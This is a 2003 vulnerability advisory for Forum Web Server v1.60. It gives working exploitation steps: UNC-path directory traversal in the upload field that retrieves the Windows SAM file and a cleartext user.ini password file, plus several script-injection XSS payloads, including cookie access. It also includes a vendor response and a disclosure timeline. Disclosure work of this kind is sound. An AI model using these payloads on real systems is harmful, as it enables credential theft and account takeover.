fws160.txt

` Multible vulnerabilities  
found in Forum Web Server v1.60  
http://www.minihttpserver.net  
  
Discovered by Dennis Rand  
www.Infowarfare.dk  
------------------------------------------------------------------------  
  
  
SUMMARY  
WebForums Server allows you to setup a bulletin board and photo/file   
xchange web service. It offers a built in HTTP engine, internal database   
engine, integrated HTML/Script pages, user management interface, message   
board engine and a secure file Upload/Download option. It is without a doubt   
the easiest and complet all in one Forum Server software you have seen.  
  
It is possible to get access to the server files outside the restricted  
area of the server, and make sensitive files public.  
Second there is XSS vulnerability in the Forum area.  
Third it is possible to steal the username and passwords  
  
DETAILS  
  
Vulnerable systems:  
Windows NT 4.0 and Windows 2000 server fully patched  
* Forum Web Server v.1.60  
  
Immune systems:  
* Forum Web Server v.1.61  
  
A command requests allows remote users to break out of restricted   
directories and gain read access to the system directory structure;   
Possibility for getting files from outside restricted areas.  
The server is also vulnerabel to XSS and last but not least   
i've disvovered a information leak to get the user database  
for the Forum Web Server.  
  
  
The following transcript demonstrates a sample exploitation of the   
vulnerabilities:  
-------------------------------------------------------------------  
Traversal:  
With in the FileSharing area, press the "Upload new file" button:  
Now in the upload field just insert :  
  
\\<vuln host>\c$\winnt\repair\sam._  
  
This will now be uploaded to and area where you can get the sam._  
and then use ex. L0pht Crack for breaking the password.  
  
XSS:  
When posting or replying to a message in the "Message Forum" it is  
possible to use XSS vulnerability both in the Subject and Message  
  
ex. insert this into either subject or Message  
<script>alert('I OwN You');</script>  
<img%20src=javascript:alert(document.domain)>  
<script>alert(document.cookie)</script>  
<script>window.open('http://www.infowarfare.dk')</script>  
  
Information leak:  
It is possible by using the Traversal exploit to get the user names and   
passwords   
from the Forum Web Server  
simply by "uploading" \\<vuln-host>\c$\program Files\web froums server\user.ini  
The Usernames and passwords are in clear text ready to use.  
--------------------------------------------------------------------  
  
Detection:  
Forum Web Server is vulnerable to the above-described attacks.   
Earlier versions may be susceptible as well. To determine if a specific   
implementation is vulnerable, experiment by following the above   
transcript.   
  
Vendor response:  
Recived first reply from David yuan (Master@minihttpserver)  
We thank you for the information and will fix this issue as soon as possible.  
  
  
  
Disclosure timeline:  
--------------------  
21/02/2003 Found the Vulnerability.  
21/02/2003 Reported to Vendor ([email protected] and   
[email protected])  
21/02/2003 Vendor reply, they now know of the vulnerabilities  
04/03/2003 Fix made public  
06/03/2003 Public Disclosure.  
  
  
ADDITIONAL INFORMATION  
The vulnerability was discovered by <mailto:[email protected]> Dennis Rand  
  
DISCLAIMER:   
The information in this bulletin is provided "AS IS" without warranty of any   
kind. In no event shall we be liable for any damages whatsoever including   
direct, indirect, incidental, consequential, loss of business profits or   
special damages.   
  
  
  
  
  
-------------------------------------------------  
This mail sent through IMP: http://horde.org/imp/  
`